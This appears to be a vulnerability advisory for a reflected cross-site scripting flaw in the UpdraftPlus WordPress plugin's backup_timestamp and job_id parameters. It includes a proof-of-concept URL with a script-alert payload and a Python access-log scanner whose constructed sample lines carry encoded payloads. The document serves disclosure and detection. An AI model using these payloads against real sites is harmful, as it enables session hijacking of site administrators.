EPSS Percentile: 38.3%
The plugin does not sanitise and escape the backup_timestamp and job_id parameters before outputting them back in admin pages, leading to Reflected Cross-Site Scripting issues.
https://example.com/wp-admin/options-general.php?page=updraftplus&backup_timestamp=<script>alert(/XSS/)%3B<%2Fscript>&action=updraft_restore
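As an added defender-side example, not part of the advisory or of the plugin's own code, the following Python scanner flags access-log requests to the updraftplus admin page whose backup_timestamp or job_id values carry markup characters; the log lines are constructed, and the scanner strips repeated percent-encoding so a double-encoded value is still caught.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Parameters the advisory names as reflected unescaped, and the admin page they belong to.
WATCHED_PARAMS = ("backup_timestamp", "job_id")
WATCHED_PAGE = "updraftplus"
MARKUP_RE = re.compile("[<>\"']")  # never legitimate in a timestamp or job id
# Common/combined log format request line; the sample lines below are constructed.
LOG_LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) \S+" (?P<status>\d{3})')

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding so a double-encoded '<' is still visible."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(request_target):
    """Return the watched parameter names whose decoded value contains markup."""
    query = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    if WATCHED_PAGE not in query.get("page", []):
        return []  # not a request the vulnerable code path would handle
    return [name for name in WATCHED_PARAMS
            if any(MARKUP_RE.search(decode_fully(v)) for v in query.get(name, []))]

def scan_access_log(lines):
    """Return (client_ip, status, params) for each request that looks like this XSS."""
    findings = []
    for line in lines:
        m = LOG_LINE_RE.match(line)
        if m:
            params = suspicious_params(m.group("target"))
            if params:
                findings.append((m.group("ip"), m.group("status"), params))
    return findings

SAMPLE_LOG = [  # constructed: benign restore, the advisory's payload shape, double-encoded value, unrelated page
    '203.0.113.5 - - [10/Jan/2022:10:00:01 +0000] "GET /wp-admin/options-general.php?page=updraftplus&backup_timestamp=1641808800&action=updraft_restore HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Jan/2022:10:00:07 +0000] "GET /wp-admin/options-general.php?page=updraftplus&backup_timestamp=%3Cscript%3Ealert(/XSS/)%3B%3C/script%3E&action=updraft_restore HTTP/1.1" 200 5310',
    '203.0.113.9 - - [10/Jan/2022:10:00:09 +0000] "GET /wp-admin/options-general.php?page=updraftplus&job_id=%253Cb%253Ex%253C%252Fb%253E HTTP/1.1" 200 4990',
    '198.51.100.2 - - [10/Jan/2022:10:01:00 +0000] "GET /wp-admin/edit.php?s=%3Cb%3E HTTP/1.1" 200 8000',
]

if __name__ == "__main__":
    for ip, status, params in scan_access_log(SAMPLE_LOG):
        print(f"{ip} HTTP {status}: markup in {', '.join(params)}")
```

Requests to other admin pages are deliberately ignored, so this is a targeted check for the advisory's code path rather than a general XSS detector.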
plugins.trac.wordpress.org/changeset/2635585/updraftplus
plugins.trac.wordpress.org/changeset/2637112/updraftplus